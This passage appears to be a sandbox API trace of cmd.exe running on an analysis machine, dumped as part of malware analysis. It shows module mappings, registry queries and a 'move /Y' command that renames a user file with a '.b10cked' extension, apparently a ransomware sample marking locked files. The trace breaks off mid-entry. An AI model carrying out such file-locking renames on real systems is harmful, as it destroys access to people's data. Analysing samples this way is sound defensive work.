mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29788 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29789 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29790 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29791 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29792 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29793 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29794 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29795 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29796 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" 
Region: id = 29797 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29798 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29799 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29800 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29801 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29802 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29803 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 29804 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 29805 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 29979 start_va = 0x430000 end_va = 0x4effff entry_point = 0x430000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 677 os_tid = 0x91c [0202.258] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fdd4 | out: lpSystemTimeAsFileTime=0x18fdd4*(dwLowDateTime=0xad5d2380, dwHighDateTime=0x1d440a9)) [0202.258] 
GetCurrentProcessId () returned 0xdb0 [0202.258] GetCurrentThreadId () returned 0x91c [0202.258] GetTickCount () returned 0x39165 [0202.258] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdcc | out: lpPerformanceCount=0x18fdcc*=25904696165) returned 1 [0202.258] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.258] __set_app_type (_Type=0x1) [0202.258] __p__fmode () returned 0x76b331f4 [0202.258] __p__commode () returned 0x76b331fc [0202.258] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.259] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.259] GetCurrentThreadId () returned 0x91c [0202.259] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x91c) returned 0x38 [0202.259] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.259] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.259] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.259] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.259] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd64 | out: phkResult=0x18fd64*=0x0) returned 0x2 [0202.259] VirtualQuery (in: lpAddress=0x18fd9b, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: 
lpAddress=0x91000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.259] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fd34, dwLength=0x1c | out: lpBuffer=0x18fd34*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0202.259] GetConsoleOutputCP () returned 0x1b5 [0202.259] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.259] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.259] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.259] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.260] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.260] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.260] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.260] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.260] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.260] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.260] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.260] GetEnvironmentStringsW () returned 0x200190* [0202.260] FreeEnvironmentStringsW (penv=0x200190) returned 1 [0202.260] GetEnvironmentStringsW () returned 0x200190* [0202.261] FreeEnvironmentStringsW (penv=0x200190) returned 1 [0202.261] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, 
samDesired=0x2000000, phkResult=0x18ecd4 | out: phkResult=0x18ecd4*=0x40) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0xb8, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x0, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegCloseKey (hKey=0x40) returned 0x0 [0202.261] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ecd4 | out: 
phkResult=0x18ecd4*=0x40) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x40, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x1, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x0, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x9, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x4, lpData=0x18ece0*=0x9, lpcbData=0x18ecd8*=0x4) returned 0x0 [0202.261] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ecdc, lpData=0x18ece0, lpcbData=0x18ecd8*=0x1000 | out: lpType=0x18ecdc*=0x0, lpData=0x18ece0*=0x9, lpcbData=0x18ecd8*=0x1000) returned 0x2 [0202.261] RegCloseKey (hKey=0x40) returned 0x0 [0202.261] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.261] srand (_Seed=0x5b8863a4) [0202.261] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"" [0202.261] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_PRM.14.1033.hxn.b10cked\"" [0202.262] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.262] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2018f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.262] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.262] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.262] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.262] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.262] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.262] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.262] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.262] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.262] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.262] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.262] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.262] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.262] GetEnvironmentStringsW () returned 0x2022e0* [0202.262] FreeEnvironmentStringsW (penv=0x2022e0) returned 1 [0202.262] 
GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.262] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.262] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.262] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.262] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.262] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.263] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.263] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.263] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.263] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18faa0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.263] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18faa0, lpFilePart=0x18fa9c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa9c*="Desktop") returned 0x18 [0202.263] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.263] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c) returned 0x200020 [0202.263] FindClose (in: hFindFile=0x200020 | out: hFindFile=0x200020) returned 1 [0202.263] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c) returned 0x200020 [0202.263] FindClose (in: hFindFile=0x200020 | out: hFindFile=0x200020) returned 1 [0202.263] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c) returned 0x200020 [0202.263] FindClose (in: hFindFile=0x200020 | out: hFindFile=0x200020) returned 1 
[0202.264] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.264] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.264] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.264] GetEnvironmentStringsW () returned 0x202b00* [0202.264] FreeEnvironmentStringsW (penv=0x202b00) returned 1 [0202.264] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.264] GetConsoleOutputCP () returned 0x1b5 [0202.264] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.264] GetUserDefaultLCID () returned 0x409 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fbe0, cchData=128 | out: lpLCData="0") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fbe0, cchData=128 | out: lpLCData="0") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fbe0, cchData=128 | out: lpLCData="1") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, 
cchData=32 | out: lpLCData="Fri") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.265] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.265] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.266] GetConsoleTitleW (in: lpConsoleTitle=0x1f08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.266] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.266] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.266] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.266] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.267] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.267] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.267] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.267] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.267] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.267] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.267] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.270] GetConsoleTitleW (in: lpConsoleTitle=0x18f8d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.270] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.270] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.270] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.270] _wcsicmp (_String1="move", _String2="TYPE") returned -7 
[0202.270] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.270] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.270] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.270] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.270] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.270] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.270] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.270] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.270] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.270] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.270] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.270] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.270] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.270] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.270] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.271] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.271] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.271] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.271] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.271] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.271] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.271] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.271] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.271] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.271] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.271] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.271] _wcsicmp (_String1="move", 
_String2="KEYS") returned 2 [0202.271] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.272] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f694, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f68c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f68c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.272] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.272] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp 
(_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.273] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.273] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2=".") returned 63 [0202.274] _wcsicmp (_String1="MSE1C9~1.HXN", _String2="..") returned 63 [0202.274] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSE1C9~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mse1c9~1.hxn")) returned 0x2022 [0202.274] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201e50 | out: 
